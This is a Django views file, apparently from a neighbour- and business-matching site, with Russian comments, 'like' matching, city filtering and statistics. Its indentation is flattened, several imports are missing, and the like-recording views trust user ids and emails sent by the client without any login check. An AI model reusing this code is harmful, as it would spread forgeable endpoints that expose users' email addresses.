from django.urls import reverse_lazy
from create_profile.forms import CreateFormsB
from create_profile.models import CreateNeighbour, CreateBusiness, LikeModel, LikeBusinesModel, AllCities#, \
#Profession # , LikeEndModelNe
def index(request):
# Главная
if request.user.is_authenticated:
# при авторизации сообщение пользоваиелям у кого встречные лайки соседей
all_likes = LikeModel.objects.filter(like_second=request.user).values('like_first')
for all_likes_s in all_likes:
# print('all_likes-Neighb')
# print(all_likes)
step_one = []
step_two = []
if len(all_likes) > 0:
# print('шаг1 нашел')
step_one = all_likes_s
# шаг 2
all_likes_two = LikeModel.objects.filter(like_first=request.user).values('like_second')
if len(all_likes_two) > 0:
# print('шаг 2 нашел')
# print(all_likes_two)
step_two = all_likes_two
# ii = int(0)
# print('step_one :', step_one)
# print('step_two :', step_two)
for step_two_s in step_two:
if step_two_s['like_second'] == step_one['like_first']:
messages.success(request, 'Вас лайкнул пользователь: ' + step_two_s['like_second'])
email_second = LikeModel.objects.filter(like_second=step_two_s['like_second']).values('email_second')
messages.success(request, ' Напишите ему: ' + email_second[0]['email_second'])
all_likes_b = LikeBusinesModel.objects.filter(like_second=request.user).values()
for all_likes_s_b in all_likes_b:
step_one_b = []
step_two_b = []
if len(all_likes_b) > 0:
if len(all_likes_b) > 0:
step_one_b = all_likes_s_b
all_likes_b_two = LikeBusinesModel.objects.filter(like_first=request.user).values('like_second')
if len(all_likes_b_two) > 0:
step_two_b = all_likes_b_two
for all_likes_s_b_s in step_two_b:
if all_likes_s_b_s['like_second'] == step_one_b['like_first']:
messages.success(request, 'Вас лайкнул бизнес пользователь: ' + all_likes_s_b_s['like_second'])
email_second_b = LikeBusinesModel.objects.filter(like_second=all_likes_s_b_s['like_second']).values('email_second')
messages.success(request, 'Почта для связи: ' + email_second_b[0]['email_second'])
return render(request, 'index.html',)
else:
return render(request, 'index.html', )
@login_required(login_url=reverse_lazy('login'))
def all_filter_search(request):
# выводим все анкеты
list_tmp_13 = 0
allCities = AllCities.objects.all()
catalog_filter = CreateNeighbour.objects.values_list('id',
'name',
'gender',
'gender_neighb',
# 'sel_city',
# 'sel_distr',
'presence_animals',
'presence_flat',
'attitude_animals',
'attitude_smok',
'about_me',
'image',
'user_neig',
'cities',
'regin',)
tmp_append_goods = []
tmp_categ_name = []
tmp_categ_name_list = []
# формируем масив лдя прорисовки в шблоне
for all_goods_s in catalog_filter:
tmp_append_goods.append(all_goods_s)
for tmp_s in tmp_append_goods:
p = CreateNeighbour(gender=tmp_s[2])
gender = p.get_gender_display()
p = CreateNeighbour(gender_neighb=tmp_s[3])
gender_neighb = p.get_gender_neighb_display()
# p = CreateNeighbour(sel_city=tmp_s[4])
# sel_city = p.get_sel_city_display()
#
# p = CreateNeighbour(sel_distr=tmp_s[5])
# sel_distr = p.get_sel_distr_display()
p = CreateNeighbour(attitude_animals=tmp_s[6])
attitude_animals = p.get_attitude_animals_display()
p = CreateNeighbour(attitude_smok=tmp_s[7])
attitude_smok = p.get_attitude_smok_display()
cities_name = AllCities.objects.filter(name=tmp_s[11]).values('name')
distr_name = AllCities.objects.filter(name=tmp_s[12]).values('name')
# cities_b = p.get_cities_b_display()
# print('allCities_name')
#
# print(cities_name[0]['name'])
# print(distr_name[0]['name'])
list_tmp = list(tmp_s)
list_tmp[2] = gender
list_tmp[3] = gender_neighb
# list_tmp[4] = sel_city
# list_tmp[5] = sel_distr
list_tmp[6] = attitude_animals
list_tmp[7] = attitude_smok
list_tmp[11] = cities_name[0]['name']
list_tmp[12] = distr_name[0]['name']
user_like = LikeModel.objects.filter(first_id=tmp_s[10]).filter(second_id=request.user.id).values_list('id') # лайки в шаблоне
flag = 0
if len(user_like) > 0:
flag = '1'
else:
flag = '0'
list_tmp.append(flag)
list_tmp = tuple(list_tmp)
for list_tmp_s in [list_tmp]:
tmp_categ_name_list = list_tmp_s
tmp_categ_name.append(tmp_categ_name_list) # формируем массив со всеми анкетами
# print('allCities')
# print(allCities)
return render(request, 'all_neighb.html', {'serxh_filer': tmp_categ_name, 'allCities': allCities,})
@login_required(login_url=reverse_lazy('login'))
def all_busines(request):
# весь бизнес
# формируем массив со всеми анкетами
distinr = CreateBusiness.objects.order_by('category_bus').values('category_bus').distinct()
print('distin254')
print(distinr)
allCities = AllCities.objects.all()
form = CreateFormsB()
search_filer = CreateBusiness.objects.values_list('name_bus',
# 'sel_city',
# 'sel_distr',
'category_bus',
'about_me',
'image',
'user_bus',
'id',
'cities',
'regin',)
tmp_append_goods = []
tmp_categ_name = []
tmp_categ_name_list = []
for all_goods_s in search_filer:
tmp_append_goods.append(all_goods_s)
for tmp_s in tmp_append_goods:
# p = CreateBusiness(sel_city=tmp_s[1])
# sel_city = p.get_sel_city_display()
#
# p = CreateBusiness(sel_distr=tmp_s[2])
# sel_distr = p.get_sel_distr_display()
# cities_name_b = AllCities.objects.filter(id=tmp_s[8]).values('name')
# distr_name_b = AllCities.objects.filter(id=tmp_s[9]).values('name')
# search_filer_pro = Profession.objects.filter(id=tmp_s[10]).values('name')
# cities_b = p.get_cities_b_display()
# print('search_filer_pro')
# print(search_filer_pro[0]['name'])
list_tmp = list(tmp_s)
# list_tmp[1] = sel_city
# list_tmp[2] = sel_distr
# list_tmp[8] = cities_name_b[0]['name']
# list_tmp[9] = distr_name_b[0]['name']
# list_tmp[10] = search_filer_pro[0]['name']
# list_tmp[11] = search_filer_pro[0]['name']
# лайки
user_like = LikeBusinesModel.objects.filter(first_id=tmp_s[4]).filter(second_id=request.user.id).values_list('id')
flag = 0
if len(user_like) > 0:
flag = '1'
else:
flag = '0'
list_tmp.append(flag)
list_tmp = tuple(list_tmp)
for list_tmp_s in [list_tmp]:
tmp_categ_name_list = list_tmp_s
# AllCities.cities_b.all()
tmp_categ_name.append(tmp_categ_name_list)# формируем массив со всеми анкетами
return render(request, 'all_busines.html', {'serxh_filer': tmp_categ_name, 'allCities': allCities, 'form': form, 'distinr': distinr})
def likes(request):
# likes заносим в таблицу лайкующего и хозяйна анкеты
test_user = User.objects.filter(id=request.POST.get('first')).values('username', 'email')
nearly_final = LikeModel(like_first=test_user[0]['username'], email_first=test_user[0]['email'],
like_second=request.POST.get('second'), email_second=request.POST.get('email'),
first_id=request.POST.get('first'), second_id=request.POST.get('second_id'),
id_ancket=request.POST.get('id_ancket'),)
nearly_final.save(force_insert=True)
return redirect('/all_neighb/')
def likes_busines(request):
# likes заносим в таблицу лайкующего и хозяйна анкеты
test_user = User.objects.filter(id=request.POST.get('first')).values('username', 'email')
nearly_final = LikeBusinesModel(like_first=test_user[0]['username'], email_first=test_user[0]['email'],
like_second=request.POST.get('second'), email_second=request.POST.get('email'),
first_id=request.POST.get('first'), second_id=request.POST.get('second_id'),
id_ancket=request.POST.get('id_ancket'),)
nearly_final.save(force_insert=True)
return redirect('/all_busines/')
def statistics(request):
# статистика
count_us = User.objects.values('username', 'email')
count_users = (len(count_us))
all_likes = LikeModel.objects.values()
count_stat = len(all_likes)/2
all_likes_n = math.ceil(count_stat)
all_likes_b = LikeBusinesModel.objects.values()
count_stat = len(all_likes_b)/2
all_likes_bus = math.ceil(count_stat)
# for count_us_s in count_us:
print(count_us[0]['username'])
tmp =count_us[0]['username']
all_likes_count = LikeModel.objects.filter(like_second=count_us[0]['username']).count()
all_likes_count_two = LikeModel.objects.filter(like_first=count_us[0]['username']).count()
if all_likes_count > 0 and all_likes_count_two > 0:
# print('tmp')
# print(tmp)
all_likes_count_two_two = LikeModel.objects.filter(like_first=count_us[0]['username']).values()
# print('all_likes_count_two_two ')
# print(all_likes_count_two_two[0]['like_first'])
# save_end_like = LikeEndModelNe(like_first=all_likes_count_two_two[0]['like_first'],
# email_first=all_likes_count_two_two[0]['email_first'],
# like_second=all_likes_count_two_two[0]['like_second'],
# email_second=all_likes_count_two_two[0]['email_second'],)
# print('save_end_like')
# print(save_end_like)
# save_end_like.save()
# print(all_likes_count, all_likes_count_two)
return render(request, 'statistics.html', {'count_users':count_users, 'all_likes_n': all_likes_n, 'all_likes_bus': all_likes_bus})
def tree_form(request):
# по айди города получаем районы
dict1 = {}
# print(request.GET.get('id'))
city_id = request.GET.get('id')
all_child = AllCities.objects.filter(parent_id=city_id).values('name', 'id')
# print('all_child')
# print(all_child)
dict1['data']=list(all_child)# словарь в словаре для передачи json
# print('dict1')
# print(dict1)
return JsonResponse(dict1)
def tree_form_b(request):
dict2 = {}
print(request.GET.get('id'))
city_id = request.GET.get('id')
all_child = AllCities.objects.filter(parent_id=city_id).values('name', 'id')
print('all_child_b-450')
print(all_child)
# return HttpResponse('1')
dict2['data']=list(all_child)
print('dict1_b-456')
print(dict2)
# return JsonResponse({'all_child': all_child, 'status': 'ok', 'dict1': dict1})
return JsonResponse(dict2)
# return HttpResponse({'all_child': all_child,})
def search_fetch(request):
# по айди города, района и пол соседа получаем анкты
print('distr-461')
print(request.GET.get('id'))
print('seacrprof464')
print(request.GET.get('distr'))
print(request.GET)
cities_name = AllCities.objects.filter(id=request.GET.get('id')).values('name')
distr_name = AllCities.objects.filter(id=request.GET.get('distr')).values('name')
catalog_filter=CreateNeighbour.objects.filter(cities=cities_name[0]['name'],
regin=distr_name[0]['name'],
gender=request.GET.get('ender')).\
values_list('id',
'name',
'gender',
'gender_neighb',
# 'sel_city',
# 'sel_distr',
'presence_animals',
'presence_flat',
'attitude_animals',
'attitude_smok',
'about_me',
'image',
'user_neig',
'cities',
'regin',)
print('catalog_filter')
print(catalog_filter)
tmp_append_goods = []
tmp_categ_name = []
tmp_categ_name_list = []
# формируем масив лдя прорисовки в шблоне
for all_goods_s in catalog_filter:
tmp_append_goods.append(all_goods_s)
for tmp_s in tmp_append_goods:
p = CreateNeighbour(gender=tmp_s[2])
gender = p.get_gender_display()
p = CreateNeighbour(gender_neighb=tmp_s[3])
gender_neighb = p.get_gender_neighb_display()
# p = CreateNeighbour(sel_city=tmp_s[4])
# sel_city = p.get_sel_city_display()
#
# p = CreateNeighbour(sel_distr=tmp_s[5])
# sel_distr = p.get_sel_distr_display()
p = CreateNeighbour(attitude_animals=tmp_s[4])
attitude_animals = p.get_attitude_animals_display()
p = CreateNeighbour(attitude_smok=tmp_s[5])
attitude_smok = p.get_attitude_smok_display()
# cities_name = AllCities.objects.filter(id=tmp_s[11]).values('name')
# distr_name = AllCities.objects.filter(id=tmp_s[12]).values('name')
list_tmp = list(tmp_s)
list_tmp[2] = gender
list_tmp[3] = gender_neighb
# list_tmp[4] = sel_city
# list_tmp[5] = sel_distr
list_tmp[4] = attitude_animals
list_tmp[5] = attitude_smok
list_tmp[11] = cities_name[0]['name']
list_tmp[12] = distr_name[0]['name']
user_like = LikeModel.objects.filter(first_id=tmp_s[10]).filter(second_id=request.user.id).values_list('id') # лайки в шаблоне
flag = 0
if len(user_like) > 0:
flag = '1'
else:
flag = '0'
list_tmp.append(flag)
list_tmp = tuple(list_tmp)
for list_tmp_s in [list_tmp]:
tmp_categ_name_list = list_tmp_s
tmp_categ_name.append(tmp_categ_name_list) # формируем массив со всеми анкетами
print('allCities')
print(tmp_categ_name)
return render(request, 'filtr_neig.html', {'filter_ne':tmp_categ_name})
# return JsonResponse(dict1)
def search_fetch_b(request):
# dict1 = {}
# filter_ne= CreateNeighbour.objects.filter(cities_id=request.GET.get('id')).values()
# print('filter_ne')
# print(filter_ne)
print('distr-513')
print(request.GET.get('id'))
print('seacrprof546')
print(request.GET.get('distr'))
print('seacrprof-548')
print(request.GET.get('prof'))
# dict1['data']=list(filter_ne)
allCities = AllCities.objects.all()
# catalog_filter = CreateNeighbour.objects. \
# catalog_filter=CreateNeighbour.objects.filter(cities_id=request.GET.get('id'),districts_tree=request.GET.get('distr'),gender=request.GET.get('ender')). \, category_bus=request.GET.get('prof'))\
cities_name = AllCities.objects.filter(id=request.GET.get('id')).values('name')
distr_name = AllCities.objects.filter(id=request.GET.get('distr')).values('name')
search_filer = CreateBusiness.objects.filter(cities=cities_name[0]['name'],
regin=distr_name[0]['name'],
category_bus=request.GET.get('prof')).values_list('name_bus',
# 'sel_city',
# 'sel_distr',
'category_bus',
'about_me',
'image',
'user_bus',
'id',
'cities',
'regin',)
print('search_filer-561')
print(search_filer)
tmp_append_goods = []
tmp_categ_name = []
tmp_categ_name_list = []
for all_goods_s in search_filer:
tmp_append_goods.append(all_goods_s)
for tmp_s in tmp_append_goods:
# p = CreateBusiness(sel_city=tmp_s[1])
# sel_city = p.get_sel_city_display()
#
# p = CreateBusiness(sel_distr=tmp_s[2])
# sel_distr = p.get_sel_distr_display()
list_tmp = list(tmp_s)
# list_tmp[1] = sel_city
# list_tmp[2] = sel_distr
user_like = LikeBusinesModel.objects.filter(first_id=tmp_s[4]).filter(second_id=request.user.id).values_list('id')
flag = 0
if len(user_like) > 0:
flag = '1'
else:
flag = '0'
list_tmp.append(flag)
list_tmp = tuple(list_tmp)
for list_tmp_s in [list_tmp]:
tmp_categ_name_list = list_tmp_s
tmp_categ_name.append(tmp_categ_name_list)# формируем массив со всеми анкетами
print('tmp_categ_name-598')
print(tmp_categ_name)
return render(request, 'test_busines.html', {'serxh_filer': tmp_categ_name})
# return JsonResponse(dict1)
|
drhtka/prifile
|
main/views.py
|
views.py
|
py
| 21,683 |
python
|
en
|
code
| 0 |
github-code
|
6
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.